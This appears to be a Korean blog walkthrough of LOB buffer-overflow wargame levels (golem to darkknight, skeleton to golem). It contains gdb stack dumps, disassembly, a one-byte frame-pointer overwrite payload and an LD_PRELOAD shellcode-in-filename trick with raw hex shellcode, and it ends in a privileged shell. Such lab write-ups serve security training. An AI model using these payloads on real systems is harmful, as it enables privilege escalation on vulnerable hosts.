0xbffffa2c: 0xbffffbf3 0xbffffc12 0xbffffc1d 0xbffffc2b
0xbffffa3c: 0xbffffc6c 0xbffffc7f 0xbffffc90 0xbffffca5
0xbffffa4c: 0xbffffcae 0xbffffcbe 0xbffffcc9 0xbffffdbd
0xbffffa5c: 0xbffffdda 0xbffffde6 0xbffffdf1 0xbffffe02
0xbffffa6c: 0xbffffe16 0xbffffe1e 0x00000000 0x00000003
0xbffffa7c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffa8c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffa9c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffaac: 0x08048390 0x0000000b 0x000001ff 0x0000000c
0xbffffabc: 0x000001ff 0x0000000d 0x000001ff 0x0000000e
0xbffffacc: 0x000001ff 0x00000010 0x0febfbff 0x0000000f
0xbffffadc: 0xbffffb0f 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x69000000 0x00363836 0x6d6f682f 0x6f672f65
0xbffffb1c: 0x2f6d656c 0x2f706d74 0x6b726164 0x67696e6b
0xbffffb2c: 0x41007468 0x41414141 0x41414141 0x41414141
(gdb)
0xbffffb3c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb4c: 0x41414141 0x41414141 0x00414141 0x5353454c
Dump of assembler code for function problem_child:
0x8048440 <problem_child>: push %ebp
0x8048441 <problem_child+1>: mov %esp,%ebp
0x8048443 <problem_child+3>: sub $0x28,%esp
0x8048446 <problem_child+6>: push $0x29
0x8048448 <problem_child+8>: mov 0x8(%ebp),%eax
0x804844b <problem_child+11>: push %eax
0x804844c <problem_child+12>: lea 0xffffffd8(%ebp),%eax
0x804844f <problem_child+15>: push %eax
0x8048450 <problem_child+16>: call 0x8048374 <strncpy>
0x8048455 <problem_child+21>: add $0xc,%esp
0x8048458 <problem_child+24>: lea 0xffffffd8(%ebp),%eax
0x804845b <problem_child+27>: push %eax
0x804845c <problem_child+28>: push $0x8048500
0x8048461 <problem_child+33>: call 0x8048354 <printf>
0x8048466 <problem_child+38>: add $0x8,%esp
0x8048469 <problem_child+41>: leave
0x804846a <problem_child+42>: ret
0x804846b <problem_child+43>: nop
End of assembler dump.
(gdb) Quit
(gdb) b *problem_child+38
Breakpoint 2 at 0x8048466
(gdb) r `perl -e 'print "A"x40'`
Starting program: /home/golem/tmp/darkknight `perl -e 'print "A"x40'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Breakpoint 2, 0x8048466 in problem_child ()
(gdb) x/100x $ebp
0xbffff9ac: 0xbffff900 0x0804849e 0xbffffb2f 0xbffff9d8
0xbffff9bc: 0x400309cb 0x00000002 0xbffffa04 0xbffffa10
0xbffff9cc: 0x40013868 0x00000002 0x08048390 0x00000000
0xbffff9dc: 0x080483b1 0x0804846c 0x00000002 0xbffffa04
0xbffff9ec: 0x080482e4 0x080484dc 0x4000ae60 0xbffff9fc
0xbffff9fc: 0x40013e90 0x00000002 0xbffffb14 0xbffffb2f
0xbffffa0c: 0x00000000 0xbffffb58 0xbffffb7a 0xbffffb84
0xbffffa1c: 0xbffffb92 0xbffffbb1 0xbffffbbf 0xbffffbd8
0xbffffa2c: 0xbffffbf3 0xbffffc12 0xbffffc1d 0xbffffc2b
0xbffffa3c: 0xbffffc6c 0xbffffc7f 0xbffffc90 0xbffffca5
0xbffffa4c: 0xbffffcae 0xbffffcbe 0xbffffcc9 0xbffffdbd
0xbffffa5c: 0xbffffdda 0xbffffde6 0xbffffdf1 0xbffffe02
0xbffffa6c: 0xbffffe16 0xbffffe1e 0x00000000 0x00000003
0xbffffa7c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffa8c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffa9c: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffaac: 0x08048390 0x0000000b 0x000001ff 0x0000000c
0xbffffabc: 0x000001ff 0x0000000d 0x000001ff 0x0000000e
0xbffffacc: 0x000001ff 0x00000010 0x0febfbff 0x0000000f
0xbffffadc: 0xbffffb0f 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x69000000 0x00363836 0x6d6f682f 0x6f672f65
0xbffffb1c: 0x2f6d656c 0x2f706d74 0x6b726164 0x67696e6b
0xbffffb2c: 0x41007468 0x41414141 0x41414141 0x41414141
(gdb)
0xbffffb3c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb4c: 0x41414141 0x41414141 0x00414141 0x5353454c
현재 공격자가 입력한 데이터가 0xbfffb~~ 쯤에 들어가는 것을 볼 수가 있다.
SFP를 1바이트 조작할 수 있으니, 공격자가 입력한 데이터를 가리키는 주소 값들이 위치한 주소로 overwrite하면 된다.
현재 ebp는 0xbffff9~~ 대 이니까, 0xbffff900 ~ 0xbffff9ff 까지 조작 할 수 있다.
(gdb) x/100x $ebp-200
0xbffff8e4: 0x4001ad70 0x400143e0 0x00000003 0x40014650
0xbffff8f4: 0x00000001 0xbffff910 0x08048170 0x400140d4
0xbffff904: 0x078e530f 0xbffff98c 0xbffff944 0x4000a7fd
0xbffff914: 0x400143d0 0x400146b0 0x00000007 0x4000a74e
0xbffff924: 0x401081ec 0x4000ae60 0xbffffa04 0x400143e0
0xbffff934: 0x40021df0 0x401088c0 0x4002982c 0x40021df0
0xbffff944: 0xbffff974 0x4000a970 0xbffffb58 0xbffff9ac
0xbffff954: 0x4005d920 0x400143e0 0xbffff974 0x40066070
0xbffff964: 0x40106980 0x08048500 0xbffff984 0x401081ec
0xbffff974: 0xbffff9ac 0x08048466 0x08048500 0xbffff984
0xbffff984: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff994: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff9a4: 0x41414141 0x41414141 0xbffff900 0x0804849e
0xbffff9b4: 0xbffffb2f 0xbffff9d8 0x400309cb 0x00000002
0xbffff9c4: 0xbffffa04 0xbffffa10 0x40013868 0x00000002
0xbffff9d4: 0x08048390 0x00000000 0x080483b1 0x0804846c
0xbffff9e4: 0x00000002 0xbffffa04 0x080482e4 0x080484dc
0xbffff9f4: 0x4000ae60 0xbffff9fc 0x40013e90 0x00000002
0xbffffa04: 0xbffffb14 0xbffffb2f 0x00000000 0xbffffb58
0xbffffa14: 0xbffffb7a 0xbffffb84 0xbffffb92 0xbffffbb1
0xbffffa24: 0xbffffbbf 0xbffffbd8 0xbffffbf3 0xbffffc12
0xbffffa34: 0xbffffc1d 0xbffffc2b 0xbffffc6c 0xbffffc7f
0xbffffa44: 0xbffffc90 0xbffffca5 0xbffffcae 0xbffffcbe
0xbffffa54: 0xbffffcc9 0xbffffdbd 0xbffffdda 0xbffffde6
0xbffffa64: 0xbffffdf1 0xbffffe02 0xbffffe16 0xbffffe1e
(gdb)
0xbffff8e4: 0x4001ad70 0x400143e0 0x00000003 0x40014650
0xbffff8f4: 0x00000001 0xbffff910 0x08048170 0x400140d4
0xbffff904: 0x078e530f 0xbffff98c 0xbffff944 0x4000a7fd
0xbffff914: 0x400143d0 0x400146b0 0x00000007 0x4000a74e
0xbffff924: 0x401081ec 0x4000ae60 0xbffffa04 0x400143e0
0xbffff934: 0x40021df0 0x401088c0 0x4002982c 0x40021df0
0xbffff944: 0xbffff974 0x4000a970 0xbffffb58 0xbffff9ac
0xbffff954: 0x4005d920 0x400143e0 0xbffff974 0x40066070
0xbffff964: 0x40106980 0x08048500 0xbffff984 0x401081ec
0xbffff974: 0xbffff9ac 0x08048466 0x08048500 0xbffff984
0xbffff984: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff994: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff9a4: 0x41414141 0x41414141 0xbffff900 0x0804849e
0xbffff9b4: 0xbffffb2f 0xbffff9d8 0x400309cb 0x00000002
0xbffff9c4: 0xbffffa04 0xbffffa10 0x40013868 0x00000002
0xbffff9d4: 0x08048390 0x00000000 0x080483b1 0x0804846c
0xbffff9e4: 0x00000002 0xbffffa04 0x080482e4 0x080484dc
0xbffff9f4: 0x4000ae60 0xbffff9fc 0x40013e90 0x00000002
0xbffffa04: 0xbffffb14 0xbffffb2f 0x00000000 0xbffffb58
0xbffffa14: 0xbffffb7a 0xbffffb84 0xbffffb92 0xbffffbb1
0xbffffa24: 0xbffffbbf 0xbffffbd8 0xbffffbf3 0xbffffc12
0xbffffa34: 0xbffffc1d 0xbffffc2b 0xbffffc6c 0xbffffc7f
0xbffffa44: 0xbffffc90 0xbffffca5 0xbffffcae 0xbffffcbe
0xbffffa54: 0xbffffcc9 0xbffffdbd 0xbffffdda 0xbffffde6
0xbffffa64: 0xbffffdf1 0xbffffe02 0xbffffe16 0xbffffe1e
(gdb)
빨간색으로 칠해져 있는 부분이 입력한 데이터 값이다.
저곳에 0x41414141 이런 문자들 말고, 쉘코드를 넣은 환경변수의 주소를 10개정도 넣은 뒤 맨 마지막 한 바이트를 84(여기서는 84)로 overwrite해주면 된다.
[golem@localhost golem]$ ./darkknight `perl -e 'print "\xd1\xfd\xff\xbf"x10,"\xa4"'`
Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿Nyy¿¤uy¿ž-uy¿euy¿E @
bash$ my-pass
euid = 512
new attacker
bash$
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| bugbear -> giant (0) | 2014.02.20 |
|---|---|
| darkknight -> bugbear (0) | 2014.02.20 |
| skeleton -> golem (0) | 2014.02.20 |
| vampire -> skeleton (0) | 2014.02.20 |
| troll -> vampire (0) | 2014.02.20 |
LD_PRELOAD 를 사용하라는 힌트를 받았다.
LD_PRELOAD는 공유라이브러리의 경로를 지정해주는 환경변수이다.
따라서 이 LD_PRELOAD에 실린 경로는 공유라이브러리 로써 가장 먼저 탑재가 되고, 스택의 하단에 위치한다.
LD_PRELOAD로 인해서 실행시키는 프로그램의 함수를 후킹 할 수 있는데, 여기서는 단순하게 파일명을 스택에 남기는 용으로 사용한다.
[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`
[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared
[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`
0xbffff5c0: 0x00000002 0x40023fd0 0x00000000 0x00000000
0xbffff5d0: 0x40013868 0x40000814 0x400041b0 0x00000001
0xbffff5e0: 0xbffff5ec 0x40001528 0x000002c8 0x00000000
0xbffff5f0: 0x080482d0 0x00000000 0x00000001 0x40000824
0xbffff600: 0xbffff60c 0x400075bb 0x40017000 0x00002fb2
0xbffff610: 0x40013868 0xbffff7c4 0x4000380e 0x40014450
0xbffff620: 0x6d6f682f 0x6b732f65 0x74656c65 0x742f6e6f
0xbffff630: 0x412f706d 0x41414141 0x41414141 0x41414141
0xbffff640: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff650: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff660: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff670: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff680: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff690: 0x41414141 0x2e414141 0x40006f73 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbc7 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff61c 0x00060000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff5d0: 0x40013868 0x40000814 0x400041b0 0x00000001
0xbffff5e0: 0xbffff5ec 0x40001528 0x000002c8 0x00000000
0xbffff5f0: 0x080482d0 0x00000000 0x00000001 0x40000824
0xbffff600: 0xbffff60c 0x400075bb 0x40017000 0x00002fb2
0xbffff610: 0x40013868 0xbffff7c4 0x4000380e 0x40014450
0xbffff620: 0x6d6f682f 0x6b732f65 0x74656c65 0x742f6e6f
0xbffff630: 0x412f706d 0x41414141 0x41414141 0x41414141
0xbffff640: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff650: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff660: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff670: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff680: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff690: 0x41414141 0x2e414141 0x40006f73 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbc7 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff61c 0x00060000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000001 0x00000000 0x00000000
이렇게 다 밀려도 살아있다.
[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared
[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`
[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"
> '`
> '`
[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x2c,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: je 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: push %edx
0x80484c9 <main+89>: lea 0xffffffd8(%ebp),%eax
0x80484cc <main+92>: push %eax
0x80484cd <main+93>: call 0x80483a8 <strcpy>
0x80484d2 <main+98>: add $0x8,%esp
0x80484d5 <main+101>: lea 0xffffffd8(%ebp),%eax
0x80484d8 <main+104>: push %eax
0x80484d9 <main+105>: push $0x8048599
0x80484de <main+110>: call 0x8048378 <printf>
0x80484e3 <main+115>: add $0x8,%esp
0x80484e6 <main+118>: push $0x2c
0x80484e8 <main+120>: push $0x0
0x80484ea <main+122>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>: push %eax
0x80484ee <main+126>: call 0x8048398 <memset>
0x80484f3 <main+131>: add $0xc,%esp
0x80484f6 <main+134>: lea 0xffffffd8(%ebp),%eax
0x80484f9 <main+137>: mov $0xbfffffcf,%edx
0x80484fe <main+142>: mov %edx,%ecx
0x8048500 <main+144>: sub %eax,%ecx
0x8048502 <main+146>: mov %ecx,%eax
0x8048504 <main+148>: push %eax
0x8048505 <main+149>: push $0x0
0x8048507 <main+151>: lea 0xffffffd8(%ebp),%eax
0x804850a <main+154>: lea 0x30(%eax),%edx
0x804850d <main+157>: push %edx
0x804850e <main+158>: call 0x8048398 <memset>
0x8048513 <main+163>: add $0xc,%esp
0x8048516 <main+166>: leave
0x8048517 <main+167>: ret
0x8048518 <main+168>: nop
0x8048519 <main+169>: nop
0x804851a <main+170>: nop
0x804851b <main+171>: nop
0x804851c <main+172>: nop
0x804851d <main+173>: nop
0x804851e <main+174>: nop
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000: Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0: Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000: 0x00000583 0x000006de 0x00000432 0x0000013f
0xbffff010: 0x0000016e 0x000002f1 0x00000000 0x00000420
0xbffff020: 0x000006c0 0x0000052e 0x0000046c 0x00000000
0xbffff030: 0x000004cd 0x00000660 0x00000000 0x000001af
0xbffff040: 0x0000048a 0x4002bb0e 0xbffff118 0x400081e6
0xbffff050: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff060: 0x0000598c 0x00000259 0x00000000 0x00000591
0xbffff070: 0x000006ea 0x000006ec 0x0000028f 0x000005bb
0xbffff080: 0x000006ce 0x00005450 0x000003c7 0x000006c2
0xbffff090: 0x00000000 0x0000070b 0x400221c0 0x00000545
0xbffff0a0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff0b0: 0x40014ba0 0x00000002 0xbffff0d0 0x400221c0
0xbffff0c0: 0x40014b34 0x03c40f19 0xbffff14c 0x4002995c
0xbffff0d0: 0x400221c0 0x40014930 0x4002bad5 0x4002bad5
0xbffff0e0: 0x40013868 0x40014930 0x0000590a 0x0000065b
0xbffff0f0: 0x00000561 0x000005cc 0x00000000 0x40001402
0xbffff100: 0xbffff1d0 0x40008134 0x40000c7d 0x40024f23
0xbffff110: 0x40013868 0x40014930 0x00000f53 0x4000a7fd
0xbffff120: 0x40014920 0x40014c58 0x00000007 0x4000a74e
0xbffff130: 0x4010a1ec 0xbffff1d1 0x00000000 0x00000180
0xbffff140: 0x400221c0 0x4010a710 0x00000000 0x400221c0
0xbffff150: 0x40000474 0x00000000 0x40000824 0x400002f4
0xbffff160: 0x40013c00 0x00000004 0x40014ba0 0x00000004
0xbffff170: 0xbffff188 0x4001dd60 0x40014b3c 0x056e90c5
0xbffff180: 0xbffff204 0x40024f23 0x4001dd60 0x40014930
0xbffff190: 0x000000bd 0x4002bb0e 0xbffff268 0x400081e6
0xbffff1a0: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff1b0: 0x0000187f 0x00000001 0x4001fe70 0x00000310
0xbffff1c0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff1d0: 0xbffff208 0x4000a7fd 0x40014920 0x40014c58
0xbffff1e0: 0x40001402 0xbffff2b4 0x40008134 0x40000ec9
0xbffff1f0: 0x40025713 0x40013868 0x40014930 0x00001743
0xbffff200: 0x40024f23 0x4001dd60 0xbffff248 0x4000a970
0xbffff210: 0x40017000 0x40108980 0x400c0b00 0x00000000
0xbffff220: 0x40000ec9 0x400707e4 0x00000001 0x00000000
0xbffff230: 0x00000031 0x40000664 0x00000000 0x40000824
0xbffff240: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff250: 0x00000004 0xbffff26c 0x4001e4f0 0x40014b3c
0xbffff260: 0x00dc28f5 0xbffff2e8 0x40025713 0x4001e4f0
0xbffff270: 0x40014930 0x40108980 0x40017000 0x00000031
0xbffff280: 0x4010a1ec 0x40108980 0xbffff2a8 0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290: 0x40108980 0x40017000 0x00000031 0x4010a1ec
0xbffff2a0: 0x00000001 0x40108980 0xbffff2bc 0x400711c7
0xbffff2b0: 0x40108980 0xbffff2ec 0x4000a7fd 0x40014920
0xbffff2c0: 0x40014c58 0x00000007 0x4000a74e 0x4010a1ec
0xbffff2d0: 0x0804859c 0x00000001 0x40014930 0x4001e4f0
0xbffff2e0: 0x4010a320 0x40025713 0x4001e4f0 0xbffff9a4
0xbffff2f0: 0x4000a970 0x40108980 0x00000400 0x4006c2e4
0xbffff300: 0x40014930 0xbffff9a4 0x4006428b 0x40108980
0xbffff310: 0x4010a1ec 0x4000ae60 0xbffffa44 0x00000000
0xbffff320: 0x0000675b 0x000081a4 0x00000001 0x00000000
0xbffff330: 0x00000000 0x00000808 0x00000000 0x00000000
0xbffff340: 0x00008561 0x000081ed 0x00000001 0x00000000
0xbffff350: 0x40001402 0xbffff424 0x400081e6 0x400013e1
0xbffff360: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff370: 0x400013d3 0x40013c00 0x40014b90 0x0000000e
0xbffff380: 0x40013e80 0x0804859c 0x250014c4 0x00000000
0xbffff390: 0x00000001 0x4002bad5 0x40001353 0x00000000
0xbffff3a0: 0xbffff428 0x40000814 0x00000052 0x40000824
0xbffff3b0: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff3c0: 0x00000003 0xbffff3dc 0x40000814 0x400140d4
0xbffff3d0: 0x0b725f23 0xbffff4b8 0x400013a5 0x40000814
0xbffff3e0: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff3f0: 0x00000000 0x00000004 0x40014ba0 0x00000004
0xbffff400: 0xbffff420 0x40000674 0x400140d8 0x01ee5739
0xbffff410: 0xbffff4b8 0x40000edc 0x40013868 0x40013c00
0xbffff420: 0x00000000 0xbffff4e8 0x4000966a 0x080480f4
0xbffff430: 0x40014cf8 0x00000007 0x40013868 0x00000000
0xbffff440: 0x40013e70 0x40000814 0x40009c50 0x00005207
0xbffff450: 0x4001a0dc 0x4001a0dc 0x4001a0e8 0x00000018
0xbffff460: 0x400017f4 0x00000004 0x4001a0e8 0x40013c00
0xbffff470: 0xbffff4d0 0x2073f4cc 0xffffffff 0xffffffd0
0xbffff480: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff490: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a0: 0xbffff9d0 0x00000002 0x40023fd0 0x40013c00
0xbffff4b0: 0x4000ba15 0x00000000 0x00000000 0x00000001
0xbffff4c0: 0xbffff9c8 0xbffff9a3 0x0804859b 0x08048599
0xbffff4d0: 0x00000031 0xffffffff 0x00000000 0x00000001
0xbffff4e0: 0x40000824 0xbffff4f0 0x400075bb 0x40017000
0xbffff4f0: 0x00002fb2 0x40013868 0xbffff734 0x4000380e
0xbffff500: 0x400144d8 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff510: 0x742f6e6f 0x902f706d 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520: 0x90909090 0x0804859c 0x90909090 0x90909090
0xbffff530: 0x90909090 0x90909090 0x00000000 0x00000000
0xbffff540: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff550: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff560: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff570: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff580: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff590: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5d0: 0x90909090 0x90909090 0x90909090 0x68909090
0xbffff5e0: 0x81cee28a 0x530cb168 0x6f6a6854 0x0168e48a
0xbffff5f0: 0x68633069 0x69743069 0xfe59146a 0x79490c0c
0xbffff600: 0xe1f741fa 0x732ec354 0x4000006f 0x40013868
0xbffff610: 0x4000220c 0xbffffb3c 0x00000000 0x00000000
0xbffff620: 0x00000000 0x00000000 0x40014b00 0x00000000
0xbffff630: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff640: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff650: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff660: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff670: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff680: 0xbffff500 0x00060000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x4000f7cb 0x4000f7cb
0xbffff730: 0x40013868 0xbffff778 0x4000c84c 0x08048034
0xbffff740: 0x00000006 0xbffff774 0x40013868 0xbffff9a8
0xbffff750: 0x40013da0 0x0001fbf1 0xbffffa50 0x000001fe
0xbffff760: 0x000001fe 0x000001fe 0x000001fe 0x00000006
0xbffff770: 0x08048034 0x080483c0 0xbffff79c 0x40002179
0xbffff780: 0xbffffa40 0x4000220c 0x080483c0 0x40013868
0xbffff790: 0x00000000 0xbffff7f8 0xbffff788 0xbffffa34
0xbffff7a0: 0x400020ea 0xbffffa40 0xbffff808 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x2c,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: je 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: push %edx
0x80484c9 <main+89>: lea 0xffffffd8(%ebp),%eax
0x80484cc <main+92>: push %eax
0x80484cd <main+93>: call 0x80483a8 <strcpy>
0x80484d2 <main+98>: add $0x8,%esp
0x80484d5 <main+101>: lea 0xffffffd8(%ebp),%eax
0x80484d8 <main+104>: push %eax
0x80484d9 <main+105>: push $0x8048599
0x80484de <main+110>: call 0x8048378 <printf>
0x80484e3 <main+115>: add $0x8,%esp
0x80484e6 <main+118>: push $0x2c
0x80484e8 <main+120>: push $0x0
0x80484ea <main+122>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>: push %eax
0x80484ee <main+126>: call 0x8048398 <memset>
0x80484f3 <main+131>: add $0xc,%esp
